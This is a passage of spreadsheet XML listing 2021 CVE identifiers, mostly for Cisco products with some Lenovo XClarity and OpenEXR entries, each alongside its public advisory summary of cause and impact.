    <t>A vulnerability in the IP Service Level Agreements (IP SLA) responder and Two-Way Active Measurement Protocol (TWAMP) features of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause device packet memory to become exhausted or cause the IP SLA process to crash, resulting in a denial of service (DoS) condition. This vulnerability exists because socket creation failures are mishandled during the IP SLA and TWAMP processes. An attacker could exploit this vulnerability by sending specific IP SLA or TWAMP packets to an affected device. A successful exploit could allow the attacker to exhaust the packet memory, which will impact other processes, such as routing protocols, or crash the IP SLA process.</t>
  </si>
  <si>
    <t>CVE-2021-34721</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to gain access to the underlying root shell of an affected device and execute arbitrary commands with root privileges. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34722</t>
  </si>
  <si>
    <t>CVE-2021-34723</t>
  </si>
  <si>
    <t>A vulnerability in a specific CLI command that is run on Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to overwrite arbitrary files in the configuration database of an affected device. This vulnerability is due to insufficient validation of specific CLI command parameters. An attacker could exploit this vulnerability by issuing that command with specific parameters. A successful exploit could allow the attacker to overwrite the content of the configuration database and gain root-level access to an affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34724</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco IOS XE SD-WAN Software CLI could allow an authenticated, local attacker to elevate privileges and execute arbitrary code on the underlying operating system as the root user. An attacker must be authenticated on an affected device as a PRIV15 user. This vulnerability is due to insufficient file system protection and the presence of a sensitive file in the bootflash directory on an affected device. An attacker could exploit this vulnerability by overwriting an installer file stored in the bootflash directory with arbitrary commands that can be executed with root-level privileges. A successful exploit could allow the attacker to read and write changes to the configuration database on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34725</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to inject arbitrary commands to be executed with root-level privileges on the underlying operating system. This vulnerability is due to insufficient input validation on certain CLI commands. An attacker could exploit this vulnerability by authenticating to an affected device and submitting crafted input to the CLI. The attacker must be authenticated as an administrative user to execute the affected commands. A successful exploit could allow the attacker to execute commands with root-level privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34726</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to inject arbitrary commands to be executed with root-level privileges on the underlying operating system of an affected device. This vulnerability is due to insufficient input validation on certain CLI commands. An attacker could exploit this vulnerability by authenticating to an affected device and submitting crafted input to the CLI. The attacker must be authenticated as an administrative user to execute the affected commands. A successful exploit could allow the attacker to execute commands with root-level privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34727</t>
  </si>
  <si>
    <t>A vulnerability in the vDaemon process in Cisco IOS XE SD-WAN Software could allow an unauthenticated, remote attacker to cause a buffer overflow on an affected device. This vulnerability is due to insufficient bounds checking when an affected device processes traffic. An attacker could exploit this vulnerability by sending crafted traffic to the device. A successful exploit could allow the attacker to cause a buffer overflow and possibly execute arbitrary commands with root-level privileges, or cause the device to reload, which could result in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2021-34728</t>
  </si>
  <si>
    <t>CVE-2021-34729</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco IOS XE SD-WAN Software and Cisco IOS XE Software could allow an authenticated, local attacker to execute arbitrary commands with elevated privileges on an affected device. This vulnerability is due to insufficient validation of arguments passed to certain CLI commands. An attacker could exploit this vulnerability by including malicious input in the argument of an affected command. A successful exploit could allow the attacker to execute arbitrary commands with elevated privileges on the underlying operating system. An attacker would need valid user credentials to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3473</t>
  </si>
  <si>
    <t>An internal product security audit of Lenovo XClarity Controller (XCC) discovered that the XCC configuration backup/restore password may be written to an internal XCC log buffer if Lenovo XClarity Administrator (LXCA) is used to perform the backup/restore. The backup/restore password typically exists in this internal log buffer for less than 10 minutes before being overwritten. Generating an FFDC service log will include the log buffer contents, including the backup/restore password if present. The FFDC service log is only generated when requested by a privileged XCC user and it is only accessible to the privileged XCC user that requested the file. The backup/restore password is not captured if the backup/restore is initiated directly from XCC.</t>
  </si>
  <si>
    <t>CVE-2021-34730</t>
  </si>
  <si>
    <t>A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34731</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Access Registrar could allow an authenticated, remote attacker to perform a stored cross-site scripting attack on an affected system. This vulnerability exists because the web-based management interface does not sufficiently validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker would need valid administrative credentials. Cisco expects to release software updates that address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34732</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-34733</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco Prime Infrastructure and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, local attacker to access sensitive information stored on the underlying file system of an affected system. This vulnerability exists because sensitive information is not sufficiently secured when it is stored. An attacker could exploit this vulnerability by gaining unauthorized access to sensitive information on an affected system. A successful exploit could allow the attacker to create forged authentication requests and gain unauthorized access to the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-34734</t>
  </si>
  <si>
    <t>A vulnerability in the Link Layer Discovery Protocol (LLDP) implementation for the Cisco Video Surveillance 7000 Series IP Cameras firmware could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. This vulnerability is due to improper management of memory resources, referred to as a double free. An attacker could exploit this vulnerability by sending crafted LLDP packets to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).</t>
  </si>
  <si>
    <t>CVE-2021-34735</t>
  </si>
  <si>
    <t>CVE-2021-34736</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Software could allow an unauthenticated, remote attacker to cause the web-based management interface to unexpectedly restart. The vulnerability is due to insufficient input validation on the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to cause the interface to restart, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2021-34737</t>
  </si>
  <si>
    <t>A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition. This vulnerability exists because certain DHCPv4 messages are improperly validated when they are processed by an affected device. An attacker could exploit this vulnerability by sending a malformed DHCPv4 message to an affected device. A successful exploit could allow the attacker to cause a NULL pointer dereference, resulting in a crash of the dhcpd process. While the dhcpd process is restarting, which may take up to approximately two minutes, DHCPv4 server services are unavailable on the affected device. This could temporarily prevent network access to clients that join the network during that time period. Note: Only the dhcpd process crashes and eventually restarts automatically. The router does not reload.</t>
  </si>
  <si>
    <t>CVE-2021-34738</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34739</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of multiple Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to replay valid user session credentials and gain unauthorized access to the web-based management interface of an affected device. This vulnerability is due to insufficient expiration of session credentials. An attacker could exploit this vulnerability by conducting a man-in-the-middle attack against an affected device to intercept valid session credentials and then replaying the intercepted credentials toward the same device at a later time. A successful exploit could allow the attacker to access the web-based management interface with administrator privileges.</t>
  </si>
  <si>
    <t>CVE-2021-3474</t>
  </si>
  <si>
    <t>There's a flaw in OpenEXR in versions before 3.0.0-beta. A crafted input file that is processed by OpenEXR could cause a shift overflow in the FastHufDecoder, potentially leading to problems with application availability.</t>
  </si>
  <si>
    <t>CVE-2021-34740</t>
  </si>
  <si>
    <t>A vulnerability in the WLAN Control Protocol (WCP) implementation for Cisco Aironet Access Point (AP) software could allow an unauthenticated, adjacent attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to incorrect error handling when an affected device receives an unexpected 802.11 frame. An attacker could exploit this vulnerability by sending certain 802.11 frames over the wireless network to an interface on an affected AP. A successful exploit could allow the attacker to cause a packet buffer leak. This could eventually result in buffer allocation failures, which would trigger a reload of the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34741</t>
  </si>
  <si>
    <t>A vulnerability in the email scanning algorithm of Cisco AsyncOS software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to perform a denial of service (DoS) attack against an affected device. This vulnerability is due to insufficient input validation of incoming emails. An attacker could exploit this vulnerability by sending a crafted email through Cisco ESA. A successful exploit could allow the attacker to exhaust all the available CPU resources on an affected device for an extended period of time, preventing other emails from being processed and resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-34742</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-34743</t>
  </si>
  <si>
    <t>A vulnerability in the application integration feature of Cisco Webex Software could allow an unauthenticated, remote attacker to authorize an external application to integrate with and access a user's account without that user's express consent. This vulnerability is due to improper validation of cross-site request forgery (CSRF) tokens. An attacker could exploit this vulnerability by convincing a targeted user who is currently authenticated to Cisco Webex Software to follow a link designed to pass malicious input to the Cisco Webex Software application authorization interface. A successful exploit could allow the attacker to cause Cisco Webex Software to authorize an application on the user's behalf without the express consent of the user, possibly allowing external applications to read data from that user's profile.</t>
  </si>
  <si>
    <t>CVE-2021-34744</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco Business 220 Series Smart Switches firmware could allow an attacker with Administrator privileges to access sensitive login credentials or reconfigure the passwords on the user account. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34745</t>
  </si>
  <si>
    <t>A vulnerability in the AppDynamics .NET Agent for Windows could allow an attacker to leverage an authenticated, local user account to gain SYSTEM privileges. This vulnerability is due to the .NET Agent Coordinator Service executing code with SYSTEM privileges. An attacker with local access to a device that is running the vulnerable agent could create a custom process that would be launched with those SYSTEM privileges. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system. This vulnerability is fixed in AppDynamics .NET Agent Release 21.7.</t>
  </si>
  <si>
    <t>CVE-2021-34746</t>
  </si>
  <si>
    <t>A vulnerability in the TACACS+ authentication, authorization and accounting (AAA) feature of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an unauthenticated, remote attacker to bypass authentication and log in to an affected device as an administrator. This vulnerability is due to incomplete validation of user-supplied input that is passed to an authentication script. An attacker could exploit this vulnerability by injecting parameters into an authentication request. A successful exploit could allow the attacker to bypass authentication and log in as an administrator to the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34748</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Intersight Virtual Appliance could allow an authenticated, remote attacker to perform a command injection attack on an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using the web-based management interface to execute a command using crafted input. A successful exploit could allow the attacker to execute arbitrary commands using root-level privileges on an affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34749</t>
  </si>
  <si>
    <t>A vulnerability in Server Name Identification (SNI) request filtering of Cisco Web Security Appliance (WSA), Cisco Firepower Threat Defense (FTD), and the Snort detection engine could allow an unauthenticated, remote attacker to bypass filtering technology on an affected device and exfiltrate data from a compromised host. This vulnerability is due to inadequate filtering of the SSL handshake. An attacker could exploit this vulnerability by using data from the SSL client hello packet to communicate with an external server. A successful exploit could allow the attacker to execute a command-and-control attack on a compromised host and perform additional data exfiltration attacks.</t>
  </si>
  <si>
    <t>CVE-2021-3475</t>
  </si>
  <si>
    <t>There is a flaw in OpenEXR in versions before 3.0.0-beta. An attacker who can submit a crafted file to be processed by OpenEXR could cause an integer overflow, potentially leading to problems with application availability.</t>
  </si>
  <si>
    <t>CVE-2021-34754</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the payload inspection for Ethernet Industrial Protocol (ENIP) traffic for Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured rules for ENIP traffic. These vulnerabilities are due to incomplete processing during deep packet inspection for ENIP packets. An attacker could exploit these vulnerabilities by sending a crafted ENIP packet to the targeted interface. A successful exploit could allow the attacker to bypass configured access control and intrusion policies that should be activated for the ENIP packet.</t>
  </si>
  <si>
    <t>CVE-2021-34755</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands with root privileges. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34756</t>
  </si>
  <si>
    <t>CVE-2021-34757</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2021-34758</t>
  </si>
  <si>
    <t>A vulnerability in the memory management of Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an authenticated, local attacker to corrupt a shared memory segment, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient access controls to a shared memory resource. An attacker could exploit this vulnerability by corrupting a shared memory segment on an affected device. A successful exploit could allow the attacker to cause the device to reload. The device will recover from the corruption upon reboot.</t>
  </si>
  <si>
    <t>CVE-2021-34759</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need valid administrative credentials.</t>
  </si>
  <si>
    <t>CVE-2021-3476</t>
  </si>
  <si>
    <t>A flaw was found in OpenEXR's B44 uncompression functionality in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to OpenEXR could trigger shift overflows, potentially affecting application availability.</t>
  </si>
  <si>
    <t>CVE-2021-34760</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco TelePresence Management Suite (TMS) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious data in a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-34761</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to overwrite or append arbitrary data to system files using root-level privileges. The attacker must have administrative credentials on the device. This vulnerability is due to incomplete validation of user input for a specific CLI command. An attacker could exploit this vulnerability by authenticating to the device with administrative privileges and issuing a CLI command with crafted user parameters. A successful exploit could allow the attacker to overwrite or append arbitrary data to system files using root-level privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34762</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to perform a directory traversal attack on an affected device. The attacker would require valid device credentials. The vulnerability is due to insufficient input validation of the HTTPS URL by the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTPS request that contains directory traversal character sequences to an affected device. A successful exploit could allow the attacker to read or write arbitrary files on the device.</t>
  </si>
  <si>
    <t>CVE-2021-34763</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an attacker to execute a cross-site scripting (XSS) attack or an open redirect attack. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34764</t>
  </si>
  <si>
    <t>CVE-2021-34765</t>
  </si>
  <si>
    <t>A vulnerability in the web UI for Cisco Nexus Insights could allow an authenticated, remote attacker to view and download files related to the web application. The attacker requires valid device credentials. This vulnerability exists because proper role-based access control (RBAC) filters are not applied to file download actions. An attacker could exploit this vulnerability by logging in to the application and then navigating to the directory listing and download functions. A successful exploit could allow the attacker to download sensitive files that should be restricted, which could result in disclosure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-34766</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges and create, read, update, or delete records and settings in multiple functions. This vulnerability is due to insufficient authorization of the System User and System Operator role capabilities. An attacker could exploit this vulnerability by directly accessing a web resource. A successful exploit could allow the attacker to create, read, update, or delete records and settings in multiple functions without the necessary permissions on the web UI.</t>
  </si>
  <si>
    <t>CVE-2021-34767</t>
  </si>
  <si>
    <t>A vulnerability in IPv6 traffic processing of Cisco IOS XE Wireless Controller Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, adjacent attacker to cause a Layer 2 (L2) loop in a configured VLAN, resulting in a denial of service (DoS) condition for that VLAN. The vulnerability is due to a logic error when processing specific link-local IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that would flow inbound through the wired interface of an affected device. A successful exploit could allow the attacker to cause traffic drops in the affected VLAN, thus triggering the DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-34768</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol processing of Cisco IOS XE Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. These vulnerabilities are due to insufficient validation of CAPWAP packets. An attacker could exploit the vulnerabilities by sending a malformed CAPWAP packet to an affected device. A successful exploit could allow the attacker to cause the affected device to crash and reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-34769</t>
  </si>
  <si>
    <t>CVE-2021-3477</t>
  </si>
  <si>
    <t>There's a flaw in OpenEXR's deep tile sample size calculations in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger an integer overflow, subsequently leading to an out-of-bounds read. The greatest risk of this flaw is to application availability.</t>
  </si>
  <si>
    <t>CVE-2021-34770</t>
  </si>
  <si>
    <t>A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol processing of Cisco IOS XE Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, remote attacker to execute arbitrary code with administrative privileges or cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a logic error that occurs during the validation of CAPWAP packets. An attacker could exploit this vulnerability by sending a crafted CAPWAP packet to an affected device. A successful exploit could allow the attacker to execute arbitrary code with administrative privileges or cause the affected device to crash and reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-34771</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco IOS XR Software CLI could allow an authenticated, local attacker to view more information than their privileges allow. This vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by running a specific command. A successful exploit could allow the attacker to view sensitive configuration information that their privileges might not otherwise allow them to access.</t>
  </si>
  <si>
    <t>CVE-2021-34772</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Orbital could allow an unauthenticated, remote attacker to redirect users to a malicious webpage. This vulnerability is due to improper validation of URL paths in the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a crafted URL. A successful exploit could allow the attacker to redirect a user to a malicious website. This vulnerability, known as an open redirect attack, is used in phishing attacks to persuade users to visit malicious sites.</t>
  </si>
  <si>
    <t>CVE-2021-34773</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), and Cisco Unified Communications Manager IM &amp;amp; Presence Service (Unified CM IM&amp;amp;P) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected device. This vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the targeted user. These actions could include modifying the device configuration and deleting (but not creating) user accounts.</t>
  </si>
  <si>
    <t>CVE-2021-34774</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to access sensitive data on an affected system. This vulnerability exists because the application does not sufficiently protect sensitive data when responding to a specific API request. An attacker could exploit the vulnerability by sending a crafted HTTP request to the affected application. A successful exploit could allow the attacker to obtain sensitive information about the users of the application, including security questions and answers. To exploit this vulnerability an attacker would need valid Administrator credentials. Cisco expects to release software updates that address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34775</t>
  </si>
  <si>
    <t>Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2021-34776</t>
  </si>
  <si>
    <t>CVE-2021-34777</t>
  </si>
  <si>
    <t>CVE-2021-34778</t>
  </si>
  <si>
    <t>CVE-2021-34779</t>
  </si>
  <si>
    <t>CVE-2021-3478</t>
  </si>
  <si>
    <t>There's a flaw in OpenEXR's scanline input file functionality in versions before 3.0.0-beta. An attacker able to submit a crafted file to be processed by OpenEXR could consume excessive system memory. The greatest impact of this flaw is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34780</t>
  </si>
  <si>
    <t>CVE-2021-34781</t>
  </si>
  <si>
    <t>A vulnerability in the processing of SSH connections for multi-instance deployments of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the affected device. This vulnerability is due to a lack of proper error handling when an SSH session fails to be established. An attacker could exploit this vulnerability by sending a high rate of crafted SSH connections to the instance. A successful exploit could allow the attacker to cause resource exhaustion, which causes a DoS condition on the affected device. The device must be manually reloaded to recover.</t>
  </si>
  <si>
    <t>CVE-2021-34782</t>
  </si>
  <si>
    <t>A vulnerability in the API endpoints for Cisco DNA Center could allow an authenticated, remote attacker to gain access to sensitive information that should be restricted. The attacker must have valid device credentials. This vulnerability is due to improper access controls on API endpoints. An attacker could exploit the vulnerability by sending a specific API request to an affected application. A successful exploit could allow the attacker to obtain sensitive information about other users who are configured with higher privileges on the application.</t>
  </si>
  <si>
    <t>CVE-2021-34783</t>
  </si>
  <si>
    <t>A vulnerability in the software-based SSL/TLS message handler of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient validation of SSL/TLS messages when the device performs software-based SSL/TLS decryption. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: Datagram TLS (DTLS) messages cannot be used to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34784</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-34785</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco BroadWorks CommPilot Application Software could allow an authenticated, remote attacker to delete arbitrary user accounts or gain elevated privileges on an affected system.</t>
  </si>
  <si>
    <t>CVE-2021-34786</t>
  </si>
  <si>
    <t>CVE-2021-34787</t>
  </si>
  <si>
    <t>A vulnerability in the identity-based firewall (IDFW) rule processing feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass security protections. This vulnerability is due to improper handling of network requests by affected devices configured to use object group search. An attacker could exploit this vulnerability by sending a specially crafted network request to an affected device. A successful exploit could allow the attacker to bypass access control list (ACL) rules on the device, bypass security protections, and send network traffic to unauthorized hosts.</t>
  </si>
  <si>
    <t>CVE-2021-34788</t>
  </si>
  <si>
    <t>A vulnerability in the shared library loading mechanism of Cisco AnyConnect Secure Mobility Client for Linux and Mac OS could allow an authenticated, local attacker to perform a shared library hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to a race condition in the signature verification process for shared library files that are loaded on an affected device. An attacker could exploit this vulnerability by sending a series of crafted interprocess communication (IPC) messages to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected device with root privileges. To exploit this vulnerability, the attacker must have a valid account on the system.</t>
  </si>
  <si>
    <t>CVE-2021-34789</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Tetration could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack on an affected system. This vulnerability exists because the web-based management interface does not sufficiently validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker would need valid administrative credentials.</t>
  </si>
  <si>
    <t>CVE-2021-3479</t>
  </si>
  <si>
    <t>There's a flaw in OpenEXR's Scanline API functionality in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger excessive consumption of memory, resulting in an impact to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34790</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Application Level Gateway (ALG) for the Network Address Translation (NAT) feature of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass the ALG and open unauthorized connections with a host located behind the ALG. For more information about these vulnerabilities, see the Details section of this advisory. Note: These vulnerabilities have been publicly discussed as NAT Slipstreaming.</t>
  </si>
  <si>
    <t>CVE-2021-34791</t>
  </si>
  <si>
    <t>CVE-2021-34792</t>
  </si>
  <si>
    <t>A vulnerability in the memory management of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper resource management when connection rates are high. An attacker could exploit this vulnerability by opening a significant number of connections on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-34793</t>
  </si>
  <si>
    <t>A vulnerability in the TCP Normalizer of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software operating in transparent mode could allow an unauthenticated, remote attacker to poison MAC address tables, resulting in a denial of service (DoS) vulnerability. This vulnerability is due to incorrect handling of certain TCP segments when the affected device is operating in transparent mode. An attacker could exploit this vulnerability by sending a crafted TCP segment through an affected device. A successful exploit could allow the attacker to poison the MAC address tables in adjacent devices, resulting in network disruption.</t>
  </si>
  <si>
    <t>CVE-2021-34794</t>
  </si>
  <si>
    <t>A vulnerability in the Simple Network Management Protocol version 3 (SNMPv3) access control functionality of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to query SNMP data. This vulnerability is due to ineffective access control. An attacker could exploit this vulnerability by sending an SNMPv3 query to an affected device from a host that is not permitted by the SNMPv3 access control list. A successful exploit could allow the attacker to send an SNMP query to an affected device and retrieve information from the device. The attacker would need valid credentials to perform the SNMP query.</t>
  </si>
  <si>
    <t>CVE-2021-34795</t>
  </si>
  <si>
